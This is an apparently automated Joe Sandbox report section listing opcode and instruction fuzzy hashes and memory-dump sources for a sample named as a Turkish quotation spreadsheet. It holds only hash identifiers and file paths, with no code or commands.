                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2868c5d2e7c7051ed86fb3e5ef7c80fe6b5df0836fe1def09052d8a660241028
                                                  • Instruction ID: 39ab927d178b6ae7809265bfdb4a1e5c0ec7f118ea7500afc13ca2664dc39984
                                                  • Opcode Fuzzy Hash: 2868c5d2e7c7051ed86fb3e5ef7c80fe6b5df0836fe1def09052d8a660241028
                                                  • Instruction Fuzzy Hash: DA218078A42219EFCB04DF68D594EADBBF2BF49700F154055E502AB360CB31AD41CF60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 618895a3803ad603b8507e13c50df9d273f32a56cd4328c4a643627223d650e0
                                                  • Instruction ID: ef870783e9e9168ebc6a2838869d7bdf02a5c53cb7e3a635c46fc39f8edc4a64
                                                  • Opcode Fuzzy Hash: 618895a3803ad603b8507e13c50df9d273f32a56cd4328c4a643627223d650e0
                                                  • Instruction Fuzzy Hash: 0021EC74902109CFEB18EF69E485B9DBBB2FB99314F5041AAE10AA7354DB345D82CF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6196416f66c693f3ab0fa1069184aca89e2d41aa50e3db929cdadea1127f0990
                                                  • Instruction ID: 1bba2763c1cf3602fdf8fc82f9d61b61abc1395650efe90df1daf4d75eae12d1
                                                  • Opcode Fuzzy Hash: 6196416f66c693f3ab0fa1069184aca89e2d41aa50e3db929cdadea1127f0990
                                                  • Instruction Fuzzy Hash: 59211A74905119DFDB14EF69E488B9DBBB2FB45304F1041A9E00AA3355DB345EC5CF60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1ee076f607c9fdc35d48e186113d4225a82afea1e0cbcde03ee6ef14cb6eb316
                                                  • Instruction ID: cb7b66efd69ce2445988a4163338ce26d943d0237eef3c1d20bea0d49b1d491d
                                                  • Opcode Fuzzy Hash: 1ee076f607c9fdc35d48e186113d4225a82afea1e0cbcde03ee6ef14cb6eb316
                                                  • Instruction Fuzzy Hash: EC112E35905208EFCB05DF94D841AACFBB5FB48310F14D1AAEC4467395D7769A61DF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3932cf8c529eeb81b726ab713b0b08ce854d7cc97a48a6a94e1eafda79381482
                                                  • Instruction ID: 628d47a15cd87411e61ebb8b26d42339facddc6d3ea81b06929bd31acc581508
                                                  • Opcode Fuzzy Hash: 3932cf8c529eeb81b726ab713b0b08ce854d7cc97a48a6a94e1eafda79381482
                                                  • Instruction Fuzzy Hash: 0021D370A04218CFD718CF95D484BEDB7B2FB8D315F9581B5D01AAB668D338A894DB10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 147c69507740f43b57208a68390383c5f23cec6fdfff5ed157cfeba550ba40b8
                                                  • Instruction ID: a9496f8c21744cdb3bb9b685585f32bfa159f071228c11c239fc9dd07bd9dc2c
                                                  • Opcode Fuzzy Hash: 147c69507740f43b57208a68390383c5f23cec6fdfff5ed157cfeba550ba40b8
                                                  • Instruction Fuzzy Hash: AE0192366082586FD754DBACD040EEEFBF4FB59260F1584ABE485C7290D631E990CB70
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b4958b2a36febf7ee227e8485fd5c85207405e801cab370c39b480e9e2813eb4
                                                  • Instruction ID: 5bdb1ea4956b04588b07b9477c96320bc87770fada8e9b84003746e82899f793
                                                  • Opcode Fuzzy Hash: b4958b2a36febf7ee227e8485fd5c85207405e801cab370c39b480e9e2813eb4
                                                  • Instruction Fuzzy Hash: EE213A78902108CFDB18EF65E488BDDBBF2FB46304F5042AAE10AA7355CB345E858F20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: cf79206435e091fc565d97ad7f507ce3d2581d61f787015942cf7bbb22b668d0
                                                  • Instruction ID: 0c3fd4c6d066a31397d1f19dcf5d318f8e784b93d797f1830d91c354e83ae899
                                                  • Opcode Fuzzy Hash: cf79206435e091fc565d97ad7f507ce3d2581d61f787015942cf7bbb22b668d0
                                                  • Instruction Fuzzy Hash: 7F212C74901219CFDB18EF69E484B9DBBB2FB45315F5041AAE00AA7355DB345DC6CF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c894357af87b4f5587fcfd2525fff6bbca19c8a4c55d86986df2531a72a0cb35
                                                  • Instruction ID: 21dd241c14818d1ecf76bd82837eddc0219aaf33912c59e06ef44799dd35fdb0
                                                  • Opcode Fuzzy Hash: c894357af87b4f5587fcfd2525fff6bbca19c8a4c55d86986df2531a72a0cb35
                                                  • Instruction Fuzzy Hash: 25016C76340215AFD7109F59DC85F9BBBA9FB89721F10C066FA15CF290CA71D8119760
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Opcode ID: c7034eabdf267c4b43863f77e02623feed61077e27fe3b5480089e43d8e9407f
                                                  • Instruction ID: 47de283e2ea6b4278f0810b7b0d1a108d3907d43e6e6f26537b76d5902cb004f
                                                  • Opcode Fuzzy Hash: c7034eabdf267c4b43863f77e02623feed61077e27fe3b5480089e43d8e9407f
                                                  • Instruction Fuzzy Hash: 04F02B76B4D2805FD31257385810B29AFE3EB96204F1800DAD0438F6A5DA668803C361
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 075a8237d5f97071597ba86b1e8b66645649a63afb49bb35d091811ad7e983ff
                                                  • Instruction ID: 68d128f02783820b623bf8d81fe55bd2c16817a912ee6e72e83326e5de7423b3
                                                  • Opcode Fuzzy Hash: 075a8237d5f97071597ba86b1e8b66645649a63afb49bb35d091811ad7e983ff
                                                  • Instruction Fuzzy Hash: 52012D749012098FDB18EF69E095B9DBBF2FB56704F50016AE00A67255DB345E85CF20
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ca0b77487adb4bc26ef29c423fd471ec55dd5b14cef5d6a1c678208b58b418c8
                                                  • Instruction ID: 450b8bf3cfcdea8271062108ca302ef641d475d79c8b97f7e0d26bc07b9fb7e4
                                                  • Opcode Fuzzy Hash: ca0b77487adb4bc26ef29c423fd471ec55dd5b14cef5d6a1c678208b58b418c8
                                                  • Instruction Fuzzy Hash: 93016D31C0420ADBCF01DF98D8409EDFB75FF49325F10C559E99463252D731A5A6DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0bd5625a5defb3fc1d7f33ed20f0070c46bf5c99020eb1ad4ac7feb94b24c7af
                                                  • Instruction ID: c308b941b4689e383d8978d43eccfb16d7c9d702d18548ad119b378ae8d2e62f
                                                  • Opcode Fuzzy Hash: 0bd5625a5defb3fc1d7f33ed20f0070c46bf5c99020eb1ad4ac7feb94b24c7af
                                                  • Instruction Fuzzy Hash: 44F03A35B802104FCB44EB7CD51895E3AEAAFEC66131245A5E90ACB378EE79DC4187A4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 3769b376952a3686a09c22dc313cda352a1d24d070bea2333a4bc2f59ac494a0
                                                  • Instruction ID: 80946a6a189806de93925eb5ccc60da456fbb866456b751336402c875a14c749
                                                  • Opcode Fuzzy Hash: 3769b376952a3686a09c22dc313cda352a1d24d070bea2333a4bc2f59ac494a0
                                                  • Instruction Fuzzy Hash: 32F09630909248EFCB41DF98C924DADBFB9EB49251F04C1EAE85497251C6319E15DB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 2d8c2505ccc27a8373ae80f9658501fc10374b1756e82bcc108d14c437529f1d
                                                  • Instruction ID: 5553332604aaa7e822777322337e9253a2d69f5890fca095981e73513f6919b7
                                                  • Opcode Fuzzy Hash: 2d8c2505ccc27a8373ae80f9658501fc10374b1756e82bcc108d14c437529f1d
                                                  • Instruction Fuzzy Hash: 8CF0E936B452115FE31497199804B6FF7EEFBC9710F144429E90A9B351CB75AC4183E4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b90963e23448efb8d18cf957bf72b16415a58573cdcc7e727547115d3a419ccb
                                                  • Instruction ID: 5fbc4b32dfaba9c4196a769d6d8157f7e90242a7d856b55ad79a5779022141c6
                                                  • Opcode Fuzzy Hash: b90963e23448efb8d18cf957bf72b16415a58573cdcc7e727547115d3a419ccb
                                                  • Instruction Fuzzy Hash: 70012830A02059EFD714CF59F5887E9BBB7FB88306F08A0B1D6064A168D3795DA5CF02
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d173cbc3b4f472ac61e3050c76c00870e0171e067161deab533b8cebd30b2fa
                                                  • Instruction ID: 1518033dc2d10a50b48cf92262a137806f7b8e1adedfe09aa24696512f3337d0
                                                  • Opcode Fuzzy Hash: 5d173cbc3b4f472ac61e3050c76c00870e0171e067161deab533b8cebd30b2fa
                                                  • Instruction Fuzzy Hash: 1DF027317083906FD3338776DC18F277FEAEB86320F01857AE149C7581C676684187A0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5d95e907b0be1a1cf24371d551323979af92aa611e83b84c5f539c269fcc6e4d
                                                  • Instruction ID: d0ea1029f1527e6f06d285d5a24325a557df9335b9fd44a13ec7c6155d48450a
                                                  • Opcode Fuzzy Hash: 5d95e907b0be1a1cf24371d551323979af92aa611e83b84c5f539c269fcc6e4d
                                                  • Instruction Fuzzy Hash: 21F0FE6234E3D45FDB034620AD21E997F744B66A00F4A48DBD090CF0A3D616A80A87A2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 043f2994b765fa8e80c9fec4ce1345111556bcd1acca78fde9bca096c690b022
                                                  • Instruction ID: 34f1832c01715bbe3e4a7c60742b2086b08090e1452197a7dbfb03e946eda2bb
                                                  • Opcode Fuzzy Hash: 043f2994b765fa8e80c9fec4ce1345111556bcd1acca78fde9bca096c690b022
                                                  • Instruction Fuzzy Hash: 35012174905108DFDB08DF59E485BD9BBB2FB56314F0042AAE10A67295DB344DC58F61
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 13eb4589ffc0d9ed2f3b833eb13f7e83467a58b237795f6ea492a186481b3f8f
                                                  • Instruction ID: 06f6f6e8c8d0baa0c164c33bf19bcd8ae1a364e0c680405d3cff831f356420b6
                                                  • Opcode Fuzzy Hash: 13eb4589ffc0d9ed2f3b833eb13f7e83467a58b237795f6ea492a186481b3f8f
                                                  • Instruction Fuzzy Hash: 3AF0C274D082499FCB55EFA8C440AADFFF5AB06314F1481DAD81997392E3759A02CBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0c2bda2eb1e38681ff7ca52f05db8d902f4ca938b3d8aec9c12f56826f3b1399
                                                  • Instruction ID: a5222aa9b45240576931d1f5a4f490157db99fbaa59db12db2f2f3e8a76d8f00
                                                  • Opcode Fuzzy Hash: 0c2bda2eb1e38681ff7ca52f05db8d902f4ca938b3d8aec9c12f56826f3b1399
                                                  • Instruction Fuzzy Hash: 0FF06270D04248AFCB51CFA9D840BADBFF4AB09311F14C1A9E8A493281C7369752EB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6acadadebd6ac0232e9c042f6158b0ea8ce8d52702e49e41254b9872f8bb1ea2
                                                  • Instruction ID: 1ae119e7863f69a024312675cc18142e078e83c6fc47d1156a3b280b3788aec2
                                                  • Opcode Fuzzy Hash: 6acadadebd6ac0232e9c042f6158b0ea8ce8d52702e49e41254b9872f8bb1ea2
                                                  • Instruction Fuzzy Hash: FFF06DB0C19248AFCF51EFA8C5409ADBFB1AB05314F1082EADA55973A2D3355A42DB51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062700922.0000000005AD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AD0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ad0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b907a0bbf37aec8e8113937c21b1200561488870106ce90440bf8416f4c19407
                                                  • Instruction ID: d56b05e098e1d0829c1a05b3c3095de8f5bd957feaa79fb0f910ae1c4f2a90e3
                                                  • Opcode Fuzzy Hash: b907a0bbf37aec8e8113937c21b1200561488870106ce90440bf8416f4c19407
                                                  • Instruction Fuzzy Hash: 0DF06270D08245AFCB52EBA8D4009ACFFF1EF06254F1082DAD855D7252D2356A02DB91
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0fb9c99188acce5849bf64b61df7e0ebf77e6ef6608bf63c3b9a3201fbf03e82
                                                  • Instruction ID: 7d70f3d9afddb8e609c3b54b9216c1a59cb85c1406e01ee13288b78feb9dac47
                                                  • Opcode Fuzzy Hash: 0fb9c99188acce5849bf64b61df7e0ebf77e6ef6608bf63c3b9a3201fbf03e82
                                                  • Instruction Fuzzy Hash: 0CF02436610248DFC712EFB4C488FAA37F4EF02301F4100A6C4029F111FBB69504D7A1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b086bb76be64de3dfba0137f238f250322c9c0d3e1500fb72f71294d19352542
                                                  • Instruction ID: 27ccd661fc3365748ec800e2bc77509404ce70bd90ce5a0a0924470c10492822
                                                  • Opcode Fuzzy Hash: b086bb76be64de3dfba0137f238f250322c9c0d3e1500fb72f71294d19352542
                                                  • Instruction Fuzzy Hash: CEF08274D08108AFCB40DFE5D541BEDBBF5EB19301F1081AAD81997351C6359A42DB81
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2061579609.00000000057E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_57e0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 94e68c75fd78c2db6e1648dd32ccbfcf735942497c15d37a3336809cb6166ccc
                                                  • Instruction ID: 4caf7364b5725facd4fff5e869876c6aa495832d4ff902b8d4a80aa945e7c887
                                                  • Opcode Fuzzy Hash: 94e68c75fd78c2db6e1648dd32ccbfcf735942497c15d37a3336809cb6166ccc
                                                  • Instruction Fuzzy Hash: C2F06D75908348AFC755DFA8C80069CBBF4FB2D300F0480EA9859D7351D2319A01EF52
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 011c490724b7e563de4a0afe1de3b43d2a6685061afee9c17a30687522e39772
                                                  • Instruction ID: f36b7eb6a4f46c79eeb85b1fd9f26181d83d8e5919ebacd6c3135d030d749af5
                                                  • Opcode Fuzzy Hash: 011c490724b7e563de4a0afe1de3b43d2a6685061afee9c17a30687522e39772
                                                  • Instruction Fuzzy Hash: 04F0FE353506049FC714DB19D458D2AB7AAEFC9721B158069F94ACB760CA71EC42DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063553048.0000000005E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E00000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e00000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a459d9738daa83ccba482252838e84851573572b8a8fff2883dc62425bed1c6e
                                                  • Instruction ID: 2186db11a5bc9b0cde5500512aaebf9e0257b4af57fc1ecdc3d1ecd9ad09127a
                                                  • Opcode Fuzzy Hash: a459d9738daa83ccba482252838e84851573572b8a8fff2883dc62425bed1c6e
                                                  • Instruction Fuzzy Hash: CDF0F931C0020AEBCF01DF99D8409EEBB75FF89324F10D519E99877251D732A5A6DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a80833bda774596acbea73a4b0b8b26fe08886107c9dca6dce588bf3dad00bd4
                                                  • Instruction ID: e530006f5d5c93300aa9d0bc4048c13e08287d0adb2a321a1ca5f3d8fc97ff3f
                                                  • Opcode Fuzzy Hash: a80833bda774596acbea73a4b0b8b26fe08886107c9dca6dce588bf3dad00bd4
                                                  • Instruction Fuzzy Hash: 86F0BE316452049FDF28CF06EC907E57B77EBAEB15F0E80F6E1464A0A5DB7419A28B10
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2043156959.0000000003110000.00000040.00000800.00020000.00000000.sdmp, Offset: 03110000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3110000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e4cd5ff248985139449123b5723b00b84c3b033bac82e45a8e50b67ac3ceff89
                                                  • Instruction ID: e17d15604586b27d84f42b6ffff1638657f1d9a910bd517ee185267d420a7061
                                                  • Opcode Fuzzy Hash: e4cd5ff248985139449123b5723b00b84c3b033bac82e45a8e50b67ac3ceff89
                                                  • Instruction Fuzzy Hash: 34F06971E011188BEB0CDF16E895694B7F8BF4C30174A80B6C64AAB12AC734EC86CF80
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ff872006f3bb3880626e1f69eef805186aa432c253812ab35c43da38e5d3d0f0
                                                  • Instruction ID: 27518143afcc17312717e5e415f0487e586a9e7ab85c380ad941b5059807a3fb
                                                  • Opcode Fuzzy Hash: ff872006f3bb3880626e1f69eef805186aa432c253812ab35c43da38e5d3d0f0
                                                  • Instruction Fuzzy Hash: AA0181B4A002188FDB24DF58C848AE9B7B6FF4A700F1050D6D44D97355DF346E828F60
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2063678264.0000000005E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E20000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5e20000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 655b1750ef5236be395328d4da76e7a368c0a8fb0a59402c7d01197e220a5ebd
                                                  • Instruction ID: 126e53e7292f75dbe84c12633bd1b7dfa2256daa6102e6ee33128b525d1d89b2
                                                  • Opcode Fuzzy Hash: 655b1750ef5236be395328d4da76e7a368c0a8fb0a59402c7d01197e220a5ebd
                                                  • Instruction Fuzzy Hash: 8CF03974D15208DFDB00EFA9E4093ECBBB9FB54305F1081AA9849A3390E7789A44DF51
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2062772103.0000000005AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05AE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_5ae0000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 667f5a0b4e2067b673acee689534526ad00b9e086163230b4401beb793b02644
                                                  • Instruction ID: eefb6b18a3303169b0456f43624c4a3415662f20b873312abc6bf5ef2d7d1500
                                                  • Opcode Fuzzy Hash: 667f5a0b4e2067b673acee689534526ad00b9e086163230b4401beb793b02644
